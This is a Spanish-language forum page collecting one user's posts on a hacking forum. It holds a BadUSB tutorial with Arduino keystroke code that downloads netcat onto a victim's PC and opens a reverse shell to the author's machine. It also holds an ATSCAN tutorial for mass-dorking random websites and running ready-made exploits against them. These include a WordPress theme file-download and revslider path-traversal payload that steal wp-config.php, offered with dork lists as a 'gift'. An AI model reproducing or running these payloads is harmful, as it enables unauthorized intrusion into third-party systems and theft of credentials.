Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BrowserNet

#1
Hacking / Penetration testing con BadUSB
Septiembre 27, 2019, 05:51:51 PM
Hola estimados hermanos de underc0de es un placer nuevamente estar con ustedes luego de 2 años de estar ausente del foro.
Un saludo grande para los administradores, moderadores y todos los usuarios en general, un fuerte abrazo para cada uno de ustedes.

En esta oportunidad les enseñare a crear sus propios Scripts para su dispositivo de Hackeo BAD USB(rubber ducky)

¿Que es Bad USB?

Bad USB es un dispositivo USB que se comporta como otro dispositivo de teclado automatizado, que permite utilizar este dispositivo de manera maliciosa para ataques de pentesting de manera local.

Características:


    Microcontroller: ATmega32u4
    Clock Speed: 16 MHz
    Operating Voltage: 5V DC
    Digital I/O Pins: 10
    PWM Channels: 4
    Analog Input Channels: 5
    UART: 1
    I2C: 1
    Micro USB: 1
    Flash Memory: 32 KB of which 4KB used by bootloader
    SRAM: 2.5 KB
    EEPROM: 1 KB
    USB ATMEGA32U4 Development Board Module For Arduino Leonardo R3[/li]

Este dispositivo se puso de "moda" en el año 2014 y hasta el día de hoy se sigue utilizando por su eficacia.

Existe un gran demanda de estos dispositivos en varias plataformas de e commerce a nivel mundial.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

A continuación vamos a descargar el IDE Arduino.
(Dependiendo su sistema y arquitectura)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Instalación:

tar -Jxf arduino-1.8.9-linux64.tar.xz
cd arduino-1.6.12/
./install.sh

Antes de comenzar a crear el script vamos a repasar un poco de arduino.

¿Qué es Arduino?

Arduino es una plataforma y, como tal, dispone de varios elementos: hardware, software y lenguaje de programación. Este libro pretende ampliar tu lenguaje de programación y, teniendo en cuenta la base que hemos visto, no necesitamos añadir más conceptos sobre electrónica y hardware, pero si sobre el IDE de Arduino.

Estructuras de control de flujo repetitivas

Este tipo de estructuras son también conocidas como «bucles»; se diferencian de las estructuras no repetitivas en que, siempre y cuando se cumpla la condición o condiciones, se ejecutan las líneas de código una y otra vez sin salir de la estructura

While

Esta estructura ejecuta las instrucciones que se encuentran entre sus llaves de apertura y cierre. ¿Cuántas veces? Se ejecutarán mientras la condición especificada se cumpla, sin ejecutarse ninguna otra línea de código que se encuentre fuera de la estructura.
while(condición)
{
//Instrucciones que se ejecutan mientras se cumpla la condición
}

Ejemplo:




Programando en Arduino

Ejemplo 1:



Ejemplo 2:



Aprende arduino aquí:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una ves instalado el IDE Arduino, ingresamos nuestro Bad USB y buscaremos nuestra placa para poder iniciar la compilación y depuración de nuestro proyecto.



Creando nuestro Backdoor con NC en Arduino IDE

Antes de empezar a explicar un poco el  código fuente debo aclarar que la victima tiene Linux Bash Shell instalado en su sistema y aprovechare esas características para acceder al sistema.




Explicando el código fuente:

----------------------------------------------------------------------------------------------------------------------

Keyboard.begin();
// Waiting 500ms for init
  delay(500);

  delay(3000);

  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta(KEY_LEFT_GUI);
  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta(114);
  Keyboard.releaseAll();
----------------------------------------------------------------------------------------------------------------------

Estamos indicando el dispositivo pulsee la tecla WINDOWS(KEY_LEFT_GUI) y dando Enter(144) en un tempo determinado de 3 segundos.

Algunas teclas expresiones de teclado:
KEY_LEFT_CTRL
KEY_LEFT_SHIFT
KEY_LEFT_ALT
KEY_LEFT_GUI
KEY_RIGHT_CTRL
KEY_RIGHT_SHIFT
KEY_RIGHT_ALT
KEY_RIGHT_GUI
KEY_UP_ARROW
KEY_DOWN_ARROW
KEY_LEFT_ARROW
KEY_RIGHT_ARROW
KEY_BACKSPACE
KEY_TAB
KEY_RETURN
KEY_ESC
KEY_INSERT
KEY_DELETE
KEY_PAGE_UP
KEY_PAGE_DOWN
KEY_HOME
KEY_END
KEY_CAPS_LOCK
KEY_F1
KEY_F2
KEY_F3
KEY_F4
KEY_F5
KEY_F6
KEY_F7
KEY_F8
KEY_F9
KEY_F10
KEY_F11
KEY_F12

Equivalencias de otras unidades de tiempo en milisegundos

Un centisegundo equivale a 10 milisegundos.
Un decisegundo equivale a 100 milisegundos.
Un segundo equivale a 1000 milisegundos.
Un minuto equivale a 60 000 milisegundos.
Una hora equivale a 3 600 000 milisegundos.
Un día equivale a 86 400 000 milisegundo
----------------------------------------------------------------------------------------------------------------------
delay(500);
Keyboard.print("cmd");
delay(500);
typeKey(KEY_RETURN);
delay(500);
Keyboard.print("wget 192.168.0.4&nc64.exe");
typeKey(KEY_RETURN);
delay(50);
Keyboard.print("START nc64.exe 192.168.0.4 8888 /e cmd.exe /d & exit");
typeKey(KEY_RETURN); 
delay(500);
Keyboard.print("exit");
typeKey(KEY_RETURN);   
}
----------------------------------------------------------------------------------------------------------------------

Keyboard.print - Aquí añadiremos los valores que deseamos digitar de manera automatizada
typeKey(KEY_RETURN) - Boton Enter.

como podemos ver en el código anterior estoy indicando que descargue un ejecutable NC.exe con la dirección IP y el puerto de escucha de mi ordenador, una ves que se conecte me abrirá el CMD de nuestra victima.

Ejecutamos Netcat en nuestro ordenador para la conexión.

Código: php
root@kali:~# nc -l -p 8888


Ahora ingresamos el USB en la PC de nuestra victima para realizar nuestra prueba de concepto.



Reverse Shell CMD



De manera automatizada hemos conseguido acceder al sistema de nuestra victima.
No obstante también pueden subir un backdoor .exe de msfvenom y listo.

Les dejo algunos scripts que pueden utilizar para sus pruebas de concepto:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Existen herramientas que automatizan los payloads , pero quise hacer este articulo para que comprendas la estructura de un Payload en Arduino.

Saludos.


#2
Off Topic / Re:Diplomado en Seguridad y Hacking Ético
Diciembre 06, 2017, 11:54:25 PM
no mames jajjajaja  ;D
#3
Aunque no soy amante de esta distribución, voy a darle un ojo.
Gracias por su aporte bro + coin
#4
Saludos hermanos de underc0de, estuve revisando algunos mensajes de algunos usuarios que me pedian que elabore un POST sobre "Analisis de vulnerabilidades en el CMS JOOMLA", bueno empecemos.

Joomlavs es una aplicación de Ruby que puede ayudar a automatizar la evaluación de lo vulnerabilidades. puede buscar vulnerabilidades en los componentes, módulos y plantillas, así como las vulnerabilidades que existen dentro de Joomla en sí.

Descargamos el repositorio:
Código: php
git clone https://github.com/rastating/joomlavs.git


Instalamos Bundler.

Código: php
sudo gem install bundler && bundle install


Instalamos algunas dependencias, entre ellas Nokogiri

Código: php
sudo apt-get install build-essential patch
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libcurl4-openssl-dev




Auditaremos el servidor de manera "Estandar"

Código: php
root@kali:~/joomlavs# ./joomlavs.rb --scan-all --url http://www.paginaweb.com/





Encuentran los modulos vulnerables, se van a Exploit DB y al final un buen Pentest.
Son las 03:04 de la madrugada y no voy a testear exploit por exploit xD!

available databases [12]:
  • ADMISION
  • cacti
  • claro_unsa
  • claroline
  • DB_CERCAP
  • information_schema
  • mysql
  • ocsweb
  • seis
  • SICONIN
  • test
  • unsa_AA0001



    En mi opinión esta herramienta es muy util.

    Saludos.



#5
ATSCAN

Advanced Search / Dork / Mass Exploitation Scanner :P



ATSCAN, es un framework automatizado, que nos permite encontrar servidores vulnerables por medio de avanzadas metodologías de escaneo, por otra parte nos permite a su vez testear si el servidor es vulnerable o no.

Sin duda una herramienta que nos puede ahorrar mucho tiempo en nuestras auditorias cuando no dispongamos de un tiempo prolongado, deben tener en cuenta que la búsqueda se define por los "Motores" como:

Google / Bing / Ask / Yandex / Sogou

Ya explicado como funciona la herramienta, pueden ver las funciones que tiene ATSCAN.

Descripción:

Motor de búsqueda Google / Bing / Ask / Yandex / Sogou
Mass Dork Busqueda
Múltiples escaneos instantáneos.
Explotación masiva
Usa proxy.vulnerables mediante "DORKS"
Agente de usuario aleatorio.
Motor aleatorio.
Extern comandos de ejecución.
Escáner XSS / SQLI / LFI / AFD.
Filtre los sitios wordpress y Joomla en el servidor.
Buscar la página de administración.
Decodificar y codificar Base64 / MD5
Escaneado de puertos.
Extraer IPs
Extraiga correos electrónicos.
Detección automática de errores.
Detección automática de Cms.
Datos de correos.
Repetidor de secuencia automática.
Validación.
Publicar y obtener el método GET

Descarga:

Código: php
root@kali:~# https://github.com/AlisamTechnology/ATSCAN.git


luego de descarga el paquete de ATSCAN, procederemos a entrar a su carpeta respectiva y establecer permisos al archivo principal.

Código: php
root@kali:~# cd ATSCAN
root@kali:~/ATSCAN# chmod +x ./atscan.pl


posteriormente pasaremos a darle permisos al archivo de instalación y ejecutarlo.

Código: php
root@kali:~#  chmod +x ./install.sh 
root@kali:~#  ./install.sh


luego de instalar todos las depencias que necesita ASTCAN, pueden ejecutarlo de la siguiente manera para probar, si no tienen ningun error, de la siguiente manera:

Código: php
root@kali:~# atscan




Como vemos la herramienta nos carga correctamente, si ustedes añaden la opción: atscan --help podrán ver las formas de uso que pueden utilizar.



como pueden ver, en la imagen no nos muestra las demás opciones porque son demasiadas, pero ustedes podrán verlo en su terminal, o simplemente pueden visitar la pagina Github donde se encuentra la herramienta:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


NO quiero ser despreciativo con mis palabras, pero eh visto muchos tutoriales hace meses y hasta ahora que ejecutan el siguiente argumento para elaborar sus tutoriales:

atscan --dork "eventos.php" --level 10 --xss

voy a explicar esta metodología es ordinaria:

--dork = en ese parametro añadiremos la dork que deseamos realizar la busqueda.

--level = la cantidad de niveles de escaneo que queremos que se realice.

--xss = especificamos buscar solo fallas "CROSS-SITE-SCRIPTING"

Código: php
 [::] TEAM:: ALISAM TECHNOLOGY
[::] TOOL:: ATSCAN SCANNER [V 11.0]
[::] PATH:: /ATSCAN/atscan.pl
[::] PERL:: [v5.24.1]
[::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
[::] PROXY:: [No Proxy]
[::] SCAN:: [XSS]
[::] ENGINE:: [DEFAULT BING bn-IN]
[::] DORK:: [eventos.php?]
[::] LEVEL:: [10]



Esto se entiende perfectamente, lo explicado arriba pero hay algo que no te explican en tutoriales ordinarios lo siguiente.

en primer lugar  la búsqueda se realiza con "BING" en un  rango de PAÍS IN = India, ahora me pregunto si nosotros deseamos realizar la búsqueda  de servidores de nuestro PAIS O con un dominio determinado, nos arrojarán ello?
la respuesta es no, te buscara dominios de ese país.

vamos a elaborar lo siguiente, una búsqueda por medio de un indexeador especifico en mi caso escogí la opción 2, que es "GOOGLE":

Esto se entiende perfectamente, lo explicado arriba pero hay algo que no te explican en tutoriales ordinarios lo siguiente.

en primer lugar  la búsqueda se realiza con "BING" en un  rango de PAÍS IN = India, ahora me pregunto si nosotros deseamos realizar la búsqueda  de servidores de nuestro PAIS O con un dominio determinado, nos arrojarán ello?
la respuesta es no, te buscara dominios de ese país.

vamos a elaborar lo siguiente, una búsqueda por medio de un indexeador especifico en mi caso escogí la opción 2, que es "GOOGLE":


Código: php
root@kali:~# atscan --dork "noticias.php?" --xss --level 10 -m 2


[::] TEAM:: ALISAM TECHNOLOGY
[::] TOOL:: ATSCAN SCANNER [V 11.0]
[::] PATH:: /ATSCAN/atscan.pl
[::] PERL:: [v5.24.1]
[::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
[::] PROXY:: [No Proxy]
[::] SCAN:: [XSS]
[::] ENGINE:: [GOOGLE dz]
[::] DORK:: [noticias.php?]
[::] LEVEL:: [10]

-m = 2  >> Google

la diferencia de google, es que por mas que te conectes a un servidor de otro país, la palabra buscada siempre sera "indexeada" y tu servidor reconocido por ende los resultados serán orgánicos.
 
estas son las opciones que puedes utilizar para escoger a tu indexeador.

[Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]

Continuando con el escaneo podemos observar que hemos encontrado un servidor vulnerable, en el primer escenario tenemos una vulnerabilidad "MYSQL" expuesto a una explotación SQL INJECTION, se preguntaran el porque, es porque hemos utilizado una dork con el ultimo termino "?" acompañado de nuestra búsqueda personalizada.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Testando la vulnerabilidad mediante SQLMAP:



(REPORTADO)

bastante útil verdad, una búsqueda aleatoria, ahora probemos encontrando un servidores en wordpress vulnerables.
Utilizaremos el exploit que afecta un tema de wordpress conocido como /ypo-theme/

Código: php
##############################################################
# Exploit Title: WordPress Theme ypo-theme Arbitrary File Download Vulnerability
# Dork : inurl:/wp-content/themes/ypo-theme/
# Date : 2016/07/25
# Tested on : Kali Linux 2
# Category: webapps
##############################################################
#
# http://www.site.com/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php
#############################################################


Añadiremos a la terminal:

Código: php
atscan --dork "inurl:/wp-content/themes/ypo-theme/" --level 100 -m 2 --exp "/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php" --wp --wpafd


inurl:/wp-content/themes/ypo-theme/ >> Búsqueda de directorios del tema
--level >> la cantidad de niveles de escaneo que queremos que se realice.
--exp  >> Exploit en nuestro caso:

/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php


[::] TEAM:: ALISAM TECHNOLOGY
[::] TOOL:: ATSCAN SCANNER [V 11.0]
[::] PATH:: /ATSCAN/atscan.pl
[::] PERL:: [v5.24.1]
[::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
[::] PROXY:: [No Proxy]
[::] EXPLOIT:: [1 Exploit(s)]
[::] SCAN:: [AFD]
[::] GET:: [WP sites]
[::] ENGINE:: [GOOGLE bs]
[::] DORK:: [inurl:/wp-content/themes/ypo-theme/]
[::] LEVEL:: [100]



el resultado fue impresionante, entraremos a un link para comprobar si tenemos el documento sensible WP.

Ejemplo deben añadir el exploit de esta manera en su navegador:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



continuamos, una ves descargado el archivo vamos abrirlo:



Su uso es fácil, si sabes comprender algunos argumentos necesarios.
si desean explotar otros "0days", pueden ingresar al siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un regalo de mi parte:


Código: php
atscan --dork ""Index of" +/wp-content/themes/IncredibleWP/" --level 100 -m 2 --exp "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" --wp --wpafd



"Index of" +/wp-content/themes/IncredibleWP/"
"Index of" +/wp-content/themes/ultimatum"
"Index of" +/wp-content/themes/medicate/"
"Index of" +/wp-content/themes/Avada/"
"Index of" +/wp-content/themes/beach_apollo/"

Exploit: "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"


Happy Hacking!

un consejo personal

Como sabemos Google es un servicio de indexación  de paginas web's, entre muchos datos que se alojan cuando utilizamos dicho servicio de manera respectiva, el procedimiento de google, es una búsqueda respectiva de la palabra "noticias.php?id=" que recopila el código fuente de información de todas las plataformas web que contengan la palabra "noticias.php?id=" y obtener el resultado de las mismas.

Hace mucho tiempo elabore algunos POST relacionado a la auditoria de plataformas web de forma manual, por medio de distintos métodos para encontrar vulnerabilidades que un Escaner no pueden encontrar, si deseas aprender esta metodología puedes visitar el siguiente articulo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/2015/11/como-debo-empezar-para-auditar-un.html

Si deseas aprender como utilizar las dorks de google manualmente, los invito a leer el siguiente articulo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hoy en día, se están creando muchos "Frameworks" y herramientas que nos permiten optimizar todo este proceso, pero con solo un 70 % de posibilidades positivas, ya que una herramienta solamente sigue patrones establecidos, y auditar de forma manual, lleva todas tus capacidades de experiencia al limite para poder encontrar un agujero de seguridad hasta en la sopa.


Saludos!

#6
Off Topic / Re:!!Regrese hermanos !!!!
Agosto 14, 2017, 03:54:20 AM
!Muchas gracias colegas! un pĺacer para mi regresar al mundillo.
Posdata: estare posteando articulos como los viejos tiempos  8)
#7
jajajaja, no se "porque" meten Debian, si kali es basado en debian :P 
#8
Es como si me preguntaran lo siguiente:

¿Un doctor es bueno o malo?

La respuesta esta en la calidad de persona que es, Saludos.
#9
Hola Antrax, dejo un articulo que redacte el año pasado:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un fuerte abrazo desde Perú, Saludos.
#10
que chistoso ese precio JAJAJJAAJA de la tecsup todavia con sus vulnerabilidades you have an error in your SQL syntax 1 xd, en el extrangero te cobran en dolares y mas barato con certificación CIP (CODIGO INTERNACIONAL).
#11
me imagino a este joven ilustre, siguiendo el post del tuto en donde descargo el archivo.

Pasos:

Desactivar el Antivirus(PAYLOAD)
Ejecutalo como administrador (PRIVILEGIOS)
RUN DE CAMBIO DE PROCESO XD! explorer.exe

jejejejej, Saludos!
#12
Pentesting / Re:upload.php [Vulnerabilidad]
Abril 28, 2017, 04:26:40 PM
JAJAJAJA, estos temas hacen recordar mis inicios  ;D ;D ;D ;D
#13
Dudas y pedidos generales / Re:[SOLUCIONADO] Aviones
Abril 27, 2017, 04:11:34 PM
Porque siempre se van al lado oscuro xD!
#14
Off Topic / Re:Feliz cumpleaños SadFud!
Abril 27, 2017, 04:11:13 PM
Feliz cumpleaños bro.
Exitos en todo colega, un fuerte abrazo desde Perú.  8)
#15
Pentesting / Re:Method Ninja of Google Hacking
Abril 27, 2017, 04:09:56 PM
todo lo relacionado a sus preguntas estan en la descripción de cada "DORKS", no obstante pueden utilizar otros navegadores que trabajan con diferentes manejos
ejemplo: Bing, duckduckgo y SHODAN,  pueden visitar mis modulos en mi perfil.

Saludos.
#16
Hola, en mis POST estan el modulo de persistencia con msfconsole, Saludos!
#17
Buenas tardes colega, se me paso dar en enlace xD! en buena hora por tu aportación.
Saludos y exitos.
#18
Hacking / Re:Hackeando como la nsa
Abril 23, 2017, 11:51:35 PM
interesante articulo hermano, en unos momentos elaborare las pruebas de concepto en mi lab.
Saludos.
#19
porque no reportar esa vulnerabilidad?, en ves de "EXPLOTAR" algo que seguramente alguien mas lo ha hecho y con un JS en BeEF y la victima seas tu :P

Saludos!
#20
Hay varias personas que no tienen el titulo, pero son billonarios porque son visionarios en los negocios e invierten tiempo y sudor en elaborar un "PROYECTO" que cambie el mundo como lo conocemos.

Pero si eres alguien que necesita cumplirle el sueño a otros, pues te recomiendo conseguir un sueldo y que te paguen lo que se les de la gana.

Saca tu título, se el mejor en tu salón y terminalo. Completa todos los niveles superiores y te sentirás en la gloria de ser alguien de provecho para la sociedad y tu familia.


SALUDOS